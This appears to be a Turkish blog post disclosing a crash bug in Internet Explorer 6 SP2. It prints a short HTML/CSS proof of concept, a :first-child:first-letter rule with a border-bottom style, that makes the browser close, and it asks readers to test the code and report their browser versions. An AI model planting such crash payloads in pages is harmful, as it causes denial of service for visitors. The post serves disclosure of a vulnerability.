Şuan itibariyle internet explorer’in “Internet Explorer Version 6.0.2900.2180.xpsp_sp2” versiyonunda bir HTML etiketi olan
den kaynaklanan ve iexploer.exe nin o anki kopyasının çökmesine yol açan bir kodlama hatası var. Explorer da ki açık henüz DOS (Denial of Service) kategorisinde ama “Remote Code Execution” için exploit yazılmadığından/yazılamayacağından emin olamayız.
Exploitin kodunu yayınlayan siteye buradan ulaşabilirsiniz. |
<head>
<style><!–
#page div p:first-child:first-letter {
border-bottom: 2px ridge #F5DEB3;
}
//–>
</style>
</head>
<body><div id=“page”><div><p><strong>Tank</strong></p>
Yukarıdaki html kodlarını bir htm dosyasına kaydedip internet explorer’da görüntülemeye calıştığımızda aşağıdaki gibi bir hata mesajı alıyoruz ve ardından pencere kapatılıyor.
Kodu buraya tıklayarak deneyebilirsiniz.
Exploitin yayınlandığı sayfa http://rgod.altervista.org/ie_6_sp2_crash.html
Önemli: Internet Exploer’ın hangi versiyonlarının etkilendiğini anlamamız açısından kodu test edip kullandığınız tarayıcının versiyon numarasıyla birlikte sonucu yazarsanız yararlı olacaktır.
Yazan: Tankado